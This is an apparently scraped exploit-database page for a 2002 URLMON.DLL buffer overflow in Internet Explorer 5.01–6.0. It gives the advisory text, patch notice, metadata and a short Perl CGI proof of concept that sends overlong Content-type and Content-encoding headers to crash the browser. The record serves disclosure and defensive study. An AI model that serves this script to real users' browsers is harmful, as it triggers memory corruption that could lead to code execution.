header-logo
Suggest Exploit
vendor:
Internet Explorer
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Internet Explorer
Affected Version From: Microsoft Internet Explorer 5.01
Affected Version To: Microsoft Internet Explorer 6.0
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Microsoft Internet Explorer URLMON.DLL Buffer Overflow Vulnerability

A vulnerability has been discovered in Microsoft Internet Explorer. Due to insufficient bounds checking performed by URLMON.DLL it may be possible for a malicious web server to trigger a buffer overflow. This could result in the execution of arbitrary code within the context of the client user. A malicious web server can send a specially crafted HTTP response with a long Content-type and Content-encoding header to trigger the buffer overflow.

Mitigation:

Microsoft has released a patch to address this issue. Users are advised to apply the appropriate patch.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7419/info

A vulnerability has been discovered in Microsoft Internet Explorer. Due to insufficient bounds checking performed by URLMON.DLL it may be possible for a malicious web server to trigger a buffer overflow. This could result in the execution of arbitrary code within the context of the client user. 

#!/usr/bin/perl 
# 
# Name this file as "urlmon-bo.cgi" 
$LONG="A"x300; 
print "Content-type: $LONG\r\n"; 
print "Content-encoding: $LONG\r\n"; 
print "\r\n"; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- -

Navigation

Suggest Exploit

Services By CQR